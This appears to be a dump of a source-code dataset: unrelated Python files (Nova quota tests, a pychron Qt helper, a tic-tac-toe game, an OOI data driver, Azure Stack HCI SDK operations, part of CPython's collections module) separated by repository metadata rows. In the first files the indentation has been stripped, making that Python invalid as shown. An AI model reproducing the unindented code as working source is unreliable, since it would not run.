def test_reserve(self):
fake_reservations = ['1', '2']
quotas = quotas_obj.Quotas()
self.mox.StubOutWithMock(QUOTAS, 'reserve')
QUOTAS.reserve(self.context, expire='expire',
project_id='project_id', user_id='user_id',
moo='cow').AndReturn(fake_reservations)
self.mox.ReplayAll()
quotas.reserve(self.context, expire='expire',
project_id='project_id', user_id='user_id',
moo='cow')
self.assertEqual(self.context, quotas._context)
self.assertEqual(fake_reservations, quotas.reservations)
self.assertEqual('project_id', quotas.project_id)
self.assertEqual('user_id', quotas.user_id)
def test_commit(self):
fake_reservations = ['1', '2']
quotas = quotas_obj.Quotas.from_reservations(
self.context, fake_reservations)
self.mox.StubOutWithMock(QUOTAS, 'commit')
QUOTAS.commit(self.context, fake_reservations,
project_id=None, user_id=None)
self.mox.ReplayAll()
quotas.commit()
self.assertIsNone(quotas.reservations)
def test_commit_none_reservations(self):
quotas = quotas_obj.Quotas.from_reservations(self.context, None)
self.mox.StubOutWithMock(QUOTAS, 'commit')
self.mox.ReplayAll()
quotas.commit()
def test_rollback(self):
fake_reservations = ['1', '2']
quotas = quotas_obj.Quotas.from_reservations(
self.context, fake_reservations)
self.mox.StubOutWithMock(QUOTAS, 'rollback')
QUOTAS.rollback(self.context, fake_reservations,
project_id=None, user_id=None)
self.mox.ReplayAll()
quotas.rollback()
self.assertIsNone(quotas.reservations)
def test_rollback_none_reservations(self):
quotas = quotas_obj.Quotas.from_reservations(self.context, None)
self.mox.StubOutWithMock(QUOTAS, 'rollback')
self.mox.ReplayAll()
quotas.rollback()
@mock.patch('nova.db.quota_create')
def test_create_limit(self, mock_create):
quotas_obj.Quotas.create_limit(self.context, 'fake-project',
'foo', 10, user_id='user')
mock_create.assert_called_once_with(self.context, 'fake-project',
'foo', 10, user_id='user')
@mock.patch('nova.db.quota_update')
def test_update_limit(self, mock_update):
quotas_obj.Quotas.update_limit(self.context, 'fake-project',
'foo', 10, user_id='user')
mock_update.assert_called_once_with(self.context, 'fake-project',
'foo', 10, user_id='user')
class TestQuotasObject(_TestQuotasObject, test_objects._LocalTest):
pass
class TestRemoteQuotasObject(_TestQuotasObject, test_objects._RemoteTest):
pass
| 39.184524
| 78
| 0.658818
|
561d19607fa6cbc6ec10027b2fef966711617f3b
| 2,824
|
py
|
Python
|
pychron/core/ui/qt/gui.py
|
ael-noblegas/pychron
|
6ebbbb1f66a614972b62b7a9be4c784ae61b5d62
|
[
"Apache-2.0"
] | 1
|
2019-02-27T21:57:44.000Z
|
2019-02-27T21:57:44.000Z
|
pychron/core/ui/qt/gui.py
|
ael-noblegas/pychron
|
6ebbbb1f66a614972b62b7a9be4c784ae61b5d62
|
[
"Apache-2.0"
] | 80
|
2018-07-17T20:10:20.000Z
|
2021-08-17T15:38:24.000Z
|
pychron/core/ui/qt/gui.py
|
AGESLDEO/pychron
|
1a81e05d9fba43b797f335ceff6837c016633bcf
|
[
"Apache-2.0"
] | null | null | null |
# ===============================================================================
# Copyright 2013 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
# ============= standard library imports ========================
# ============= local library imports ==========================
import math
"""
http://stackoverflow.com/questions/10991991/pyside-easier-way-of-updating-gui-from-another-thread
"""
#
#
# class InvokeEvent(QtCore.QEvent):
# EVENT_TYPE = QtCore.QEvent.Type(QtCore.QEvent.registerEventType())
#
# def __init__(self, fn, *args, **kwargs):
# QtCore.QEvent.__init__(self, InvokeEvent.EVENT_TYPE)
# self.fn = fn
# self.args = args
# self.kwargs = kwargs
#
#
# class Invoker(QtCore.QObject):
# def event(self, event):
# event.fn(*event.args, **event.kwargs)
# return True
#
#
# _invoker = Invoker()
#
# def invoke_in_main_thread(fn, *args, **kwargs):
# QtCore.QCoreApplication.postEvent(_invoker, InvokeEvent(fn, *args, **kwargs), QtCore.Qt.NormalEventPriority)
# QtCore.QCoreApplication.sendPostedEvents(_invoker)
# QtCore.QCoreApplication.processEvents()
# def invoke_in_main_thread(fn, *args, **kw):
# from pyface.gui import GUI
# GUI.invoke_later(fn, *args, **kw)
def convert_color(color, output='rgbF'):
from pyface.qt.QtGui import QColor
if isinstance(color, QColor):
rgb = color.red(), color.green(), color.blue()
if output == 'rgbF':
args = rgb[:3]
elif output == 'rgbaF':
args = rgb
return [x/255. for x in args]
def wake_screen():
import random, time
from pyface.qt.QtGui import QCursor
time.sleep(5)
q = QCursor()
pos = q.pos()
ox, oy = pos.x(), pos.y()
def rgen():
r = 300
while 1:
theta = math.radians(random.random() * 360)
x = r * math.cos(theta)
y = r * math.sin(theta)
yield ox + x, oy + y
random_point = rgen()
for i in range(5):
x, y = next(random_point)
q.setPos(x, y)
time.sleep(0.1)
q.setPos(ox, oy)
# ============= EOF =============================================
| 28.525253
| 114
| 0.566572
|
2b694ad0a207e81e69b458b6b45db42af9919c95
| 3,591
|
py
|
Python
|
Test.py
|
JamesTaylor-creator/Tic-Tac-Toe-COSC-1436-301
|
ad7ad16bbcb85d2baccc485d30ca127081a1c4f2
|
[
"MIT"
] | 1
|
2021-03-24T22:35:11.000Z
|
2021-03-24T22:35:11.000Z
|
Test.py
|
JamesTaylor-creator/Tic-Tac-Toe-COSC-1436-301
|
ad7ad16bbcb85d2baccc485d30ca127081a1c4f2
|
[
"MIT"
] | 2
|
2021-04-08T16:31:00.000Z
|
2021-04-17T02:34:20.000Z
|
Test.py
|
JamesTaylor-creator/Tic-Tac-Toe-COSC-1436-301
|
ad7ad16bbcb85d2baccc485d30ca127081a1c4f2
|
[
"MIT"
] | 1
|
2021-03-25T01:54:15.000Z
|
2021-03-25T01:54:15.000Z
|
class my_class(object):
pass
#Tic Tac Toe game in python
board = [' ' for x in range(10)]
def insertLetter(letter, pos):
board[pos] = letter
def spaceIsFree(pos):
return board[pos] == ' '
def printBoard(board):
print(' | |')
print(' ' + board[1] + ' | ' + board[2] + ' | ' + board[3])
print(' | |')
print('-----------')
print(' | |')
print(' ' + board[4] + ' | ' + board[5] + ' | ' + board[6])
print(' | |')
print('-----------')
print(' | |')
print(' ' + board[7] + ' | ' + board[8] + ' | ' + board[9])
print(' | |')
def isWinner(bo, le):
return (bo[7] == le and bo[8] == le and bo[9] == le) or (bo[4] == le and bo[5] == le and bo[6] == le) or(bo[1] == le and bo[2] == le and bo[3] == le) or(bo[1] == le and bo[4] == le and bo[7] == le) or(bo[2] == le and bo[5] == le and bo[8] == le) or(bo[3] == le and bo[6] == le and bo[9] == le) or(bo[1] == le and bo[5] == le and bo[9] == le) or(bo[3] == le and bo[5] == le and bo[7] == le)
def playerMove():
run = True
while run:
move = input('Please select a position to place an \'X\' (1-9): ')
try:
move = int(move)
if move > 0 and move < 10:
if spaceIsFree(move):
run = False
insertLetter('X', move)
else:
print('Sorry, this space is occupied!')
else:
print('Please type a number within the range!')
except:
print('Please type a number!')
def compMove():
possibleMoves = [x for x, letter in enumerate(board) if letter == ' ' and x != 0]
move = 0
for let in ['O', 'X']:
for i in possibleMoves:
boardCopy = board[:]
boardCopy[i] = let
if isWinner(boardCopy, let):
move = i
return move
cornersOpen = []
for i in possibleMoves:
if i in [1,3,7,9]:
cornersOpen.append(i)
if len(cornersOpen) > 0:
move = selectRandom(cornersOpen)
return move
if 5 in possibleMoves:
move = 5
return move
edgesOpen = []
for i in possibleMoves:
if i in [2,4,6,8]:
edgesOpen.append(i)
if len(edgesOpen) > 0:
move = selectRandom(edgesOpen)
return move
def selectRandom(li):
import random
ln = len(li)
r = random.randrange(0,ln)
return li[r]
def isBoardFull(board):
if board.count(' ') > 1:
return False
else:
return True
def main():
print('Welcome to Tic Tac Toe!')
printBoard(board)
while not(isBoardFull(board)):
if not(isWinner(board, 'O')):
playerMove()
printBoard(board)
else:
print('Sorry, O\'s won this time!')
break
if not(isWinner(board, 'X')):
move = compMove()
if move == 0:
print('Tie Game!')
else:
insertLetter('O', move)
print('Computer placed an \'O\' in position', move , ':')
printBoard(board)
else:
print('X\'s won this time! Good Job!')
break
if isBoardFull(board):
print('Tie Game!')
while True:
answer = input('Do you want to play again? (Y/N)')
if answer.lower() == 'y' or answer.lower == 'yes':
board = [' ' for x in range(10)]
print('-----------------------------------')
main()
else:
break
| 27
| 393
| 0.465887
|
51b737d01fef41f5cb65d16e821995c9a4f78657
| 1,250
|
py
|
Python
|
mi/dataset/driver/presf_abc/dcl/presf_abc_dcl_telemetered_driver.py
|
petercable/mi-dataset
|
d3c1607ea31af85fbba5719a31d4a60bf39f8dd3
|
[
"BSD-2-Clause"
] | 1
|
2018-09-14T23:28:29.000Z
|
2018-09-14T23:28:29.000Z
|
mi/dataset/driver/presf_abc/dcl/presf_abc_dcl_telemetered_driver.py
|
petercable/mi-dataset
|
d3c1607ea31af85fbba5719a31d4a60bf39f8dd3
|
[
"BSD-2-Clause"
] | 33
|
2017-04-25T19:53:45.000Z
|
2022-03-18T17:42:18.000Z
|
mi/dataset/driver/presf_abc/dcl/presf_abc_dcl_telemetered_driver.py
|
petercable/mi-dataset
|
d3c1607ea31af85fbba5719a31d4a60bf39f8dd3
|
[
"BSD-2-Clause"
] | 31
|
2015-03-04T01:01:09.000Z
|
2020-10-28T14:42:12.000Z
|
#!/usr/local/bin/python2.7
##
# OOIPLACEHOLDER
#
# Copyright 2014 Raytheon Co.
##
__author__ = 'Jeff Roy'
from mi.dataset.dataset_driver import SimpleDatasetDriver
from mi.dataset.parser.presf_abc_dcl import PresfAbcDclParser
from mi.core.versioning import version
@version("15.6.1")
def parse(unused, source_file_path, particle_data_handler):
"""
This is the method called by Uframe
:param unused
:param source_file_path This is the full path and filename of the file to be parsed
:param particle_data_handler Java Object to consume the output of the parser
:return particle_data_handler
"""
with open(source_file_path, 'rU') as stream_handle:
# create and instance of the concrete driver class defined below
driver = PresfAbcDclTelemeteredDriver(unused, stream_handle, particle_data_handler)
driver.processFileStream()
return particle_data_handler
class PresfAbcDclTelemeteredDriver(SimpleDatasetDriver):
"""
Derived presf_abc_dcl driver class
All this needs to do is create a concrete _build_parser method
"""
def _build_parser(self, stream_handle):
parser = PresfAbcDclParser(stream_handle, self._exception_callback, True)
return parser
| 27.173913
| 91
| 0.7488
|
337cbb9d118bcd4fec8dd85e9549dde40a651344
| 20,827
|
py
|
Python
|
src/stack-hci/azext_stack_hci/vendored_sdks/azurestackhci/aio/operations/_clusters_operations.py
|
haroonf/azure-cli-extensions
|
61c044d34c224372f186934fa7c9313f1cd3a525
|
[
"MIT"
] | 207
|
2017-11-29T06:59:41.000Z
|
2022-03-31T10:00:53.000Z
|
src/stack-hci/azext_stack_hci/vendored_sdks/azurestackhci/aio/operations/_clusters_operations.py
|
haroonf/azure-cli-extensions
|
61c044d34c224372f186934fa7c9313f1cd3a525
|
[
"MIT"
] | 4,061
|
2017-10-27T23:19:56.000Z
|
2022-03-31T23:18:30.000Z
|
src/stack-hci/azext_stack_hci/vendored_sdks/azurestackhci/aio/operations/_clusters_operations.py
|
haroonf/azure-cli-extensions
|
61c044d34c224372f186934fa7c9313f1cd3a525
|
[
"MIT"
] | 802
|
2017-10-11T17:36:26.000Z
|
2022-03-31T22:24:32.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class ClustersOperations:
"""ClustersOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.azurestackhci.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list_by_subscription(
self,
**kwargs
) -> AsyncIterable["_models.ClusterList"]:
"""List all HCI clusters in a subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ClusterList or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.azurestackhci.models.ClusterList]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ClusterList"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-10-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_subscription.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('ClusterList', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(_models.ErrorResponse, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_by_subscription.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.AzureStackHCI/clusters'} # type: ignore
def list_by_resource_group(
self,
resource_group_name: str,
**kwargs
) -> AsyncIterable["_models.ClusterList"]:
"""List all HCI clusters in a resource group.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ClusterList or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.azurestackhci.models.ClusterList]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ClusterList"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-10-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_resource_group.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('ClusterList', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(_models.ErrorResponse, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.AzureStackHCI/clusters'} # type: ignore
async def get(
self,
resource_group_name: str,
cluster_name: str,
**kwargs
) -> "_models.Cluster":
"""Get HCI cluster.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param cluster_name: The name of the cluster.
:type cluster_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Cluster, or the result of cls(response)
:rtype: ~azure.mgmt.azurestackhci.models.Cluster
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Cluster"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-10-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'clusterName': self._serialize.url("cluster_name", cluster_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('Cluster', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.AzureStackHCI/clusters/{clusterName}'} # type: ignore
async def create(
self,
resource_group_name: str,
cluster_name: str,
cluster: "_models.Cluster",
**kwargs
) -> "_models.Cluster":
"""Create an HCI cluster.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param cluster_name: The name of the cluster.
:type cluster_name: str
:param cluster: Details of the HCI cluster.
:type cluster: ~azure.mgmt.azurestackhci.models.Cluster
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Cluster, or the result of cls(response)
:rtype: ~azure.mgmt.azurestackhci.models.Cluster
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Cluster"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'clusterName': self._serialize.url("cluster_name", cluster_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(cluster, 'Cluster')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('Cluster', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.AzureStackHCI/clusters/{clusterName}'} # type: ignore
async def update(
self,
resource_group_name: str,
cluster_name: str,
cluster: "_models.ClusterUpdate",
**kwargs
) -> "_models.Cluster":
"""Update an HCI cluster.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param cluster_name: The name of the cluster.
:type cluster_name: str
:param cluster: Details of the HCI cluster.
:type cluster: ~azure.mgmt.azurestackhci.models.ClusterUpdate
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Cluster, or the result of cls(response)
:rtype: ~azure.mgmt.azurestackhci.models.Cluster
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Cluster"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'clusterName': self._serialize.url("cluster_name", cluster_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(cluster, 'ClusterUpdate')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('Cluster', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.AzureStackHCI/clusters/{clusterName}'} # type: ignore
async def delete(
self,
resource_group_name: str,
cluster_name: str,
**kwargs
) -> None:
"""Delete an HCI cluster.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param cluster_name: The name of the cluster.
:type cluster_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-10-01"
accept = "application/json"
# Construct URL
url = self.delete.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'clusterName': self._serialize.url("cluster_name", cluster_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.AzureStackHCI/clusters/{clusterName}'} # type: ignore
| 48.434884
| 174
| 0.658472
|
26aeac180c7151369e377ea6729966db3b32e9b8
| 45,812
|
py
|
Python
|
contrib/tools/python3/src/Lib/collections/__init__.py
|
HeyLey/catboost
|
f472aed90604ebe727537d9d4a37147985e10ec2
|
[
"Apache-2.0"
] | 36
|
2019-06-07T20:44:06.000Z
|
2022-03-23T06:19:43.000Z
|
contrib/tools/python3/src/Lib/collections/__init__.py
|
HeyLey/catboost
|
f472aed90604ebe727537d9d4a37147985e10ec2
|
[
"Apache-2.0"
] | 32
|
2018-05-01T05:24:43.000Z
|
2022-03-11T23:20:39.000Z
|
contrib/tools/python3/src/Lib/collections/__init__.py
|
HeyLey/catboost
|
f472aed90604ebe727537d9d4a37147985e10ec2
|
[
"Apache-2.0"
] | 31
|
2019-01-15T20:16:50.000Z
|
2022-03-01T05:47:38.000Z
|
'''This module implements specialized container datatypes providing
alternatives to Python's general purpose built-in containers, dict,
list, set, and tuple.
* namedtuple factory function for creating tuple subclasses with named fields
* deque list-like container with fast appends and pops on either end
* ChainMap dict-like class for creating a single view of multiple mappings
* Counter dict subclass for counting hashable objects
* OrderedDict dict subclass that remembers the order entries were added
* defaultdict dict subclass that calls a factory function to supply missing values
* UserDict wrapper around dictionary objects for easier dict subclassing
* UserList wrapper around list objects for easier list subclassing
* UserString wrapper around string objects for easier string subclassing
'''
__all__ = ['deque', 'defaultdict', 'namedtuple', 'UserDict', 'UserList',
'UserString', 'Counter', 'OrderedDict', 'ChainMap']
# For backwards compatibility, continue to make the collections ABCs
# available through the collections module.
from _collections_abc import *
import _collections_abc
__all__ += _collections_abc.__all__
from operator import itemgetter as _itemgetter, eq as _eq
from keyword import iskeyword as _iskeyword
import sys as _sys
import heapq as _heapq
from _weakref import proxy as _proxy
from itertools import repeat as _repeat, chain as _chain, starmap as _starmap
from reprlib import recursive_repr as _recursive_repr
try:
from _collections import deque
except ImportError:
pass
else:
MutableSequence.register(deque)
try:
from _collections import defaultdict
except ImportError:
pass
################################################################################
### OrderedDict
################################################################################
class _OrderedDictKeysView(KeysView):
def __reversed__(self):
yield from reversed(self._mapping)
class _OrderedDictItemsView(ItemsView):
def __reversed__(self):
for key in reversed(self._mapping):
yield (key, self._mapping[key])
class _OrderedDictValuesView(ValuesView):
def __reversed__(self):
for key in reversed(self._mapping):
yield self._mapping[key]
class _Link(object):
__slots__ = 'prev', 'next', 'key', '__weakref__'
class OrderedDict(dict):
'Dictionary that remembers insertion order'
# An inherited dict maps keys to values.
# The inherited dict provides __getitem__, __len__, __contains__, and get.
# The remaining methods are order-aware.
# Big-O running times for all methods are the same as regular dictionaries.
# The internal self.__map dict maps keys to links in a doubly linked list.
# The circular doubly linked list starts and ends with a sentinel element.
# The sentinel element never gets deleted (this simplifies the algorithm).
# The sentinel is in self.__hardroot with a weakref proxy in self.__root.
# The prev links are weakref proxies (to prevent circular references).
# Individual links are kept alive by the hard reference in self.__map.
# Those hard references disappear when a key is deleted from an OrderedDict.
def __init__(*args, **kwds):
'''Initialize an ordered dictionary. The signature is the same as
regular dictionaries. Keyword argument order is preserved.
'''
if not args:
raise TypeError("descriptor '__init__' of 'OrderedDict' object "
"needs an argument")
self, *args = args
if len(args) > 1:
raise TypeError('expected at most 1 arguments, got %d' % len(args))
try:
self.__root
except AttributeError:
self.__hardroot = _Link()
self.__root = root = _proxy(self.__hardroot)
root.prev = root.next = root
self.__map = {}
self.__update(*args, **kwds)
def __setitem__(self, key, value,
dict_setitem=dict.__setitem__, proxy=_proxy, Link=_Link):
'od.__setitem__(i, y) <==> od[i]=y'
# Setting a new item creates a new link at the end of the linked list,
# and the inherited dictionary is updated with the new key/value pair.
if key not in self:
self.__map[key] = link = Link()
root = self.__root
last = root.prev
link.prev, link.next, link.key = last, root, key
last.next = link
root.prev = proxy(link)
dict_setitem(self, key, value)
def __delitem__(self, key, dict_delitem=dict.__delitem__):
'od.__delitem__(y) <==> del od[y]'
# Deleting an existing item uses self.__map to find the link which gets
# removed by updating the links in the predecessor and successor nodes.
dict_delitem(self, key)
link = self.__map.pop(key)
link_prev = link.prev
link_next = link.next
link_prev.next = link_next
link_next.prev = link_prev
link.prev = None
link.next = None
def __iter__(self):
'od.__iter__() <==> iter(od)'
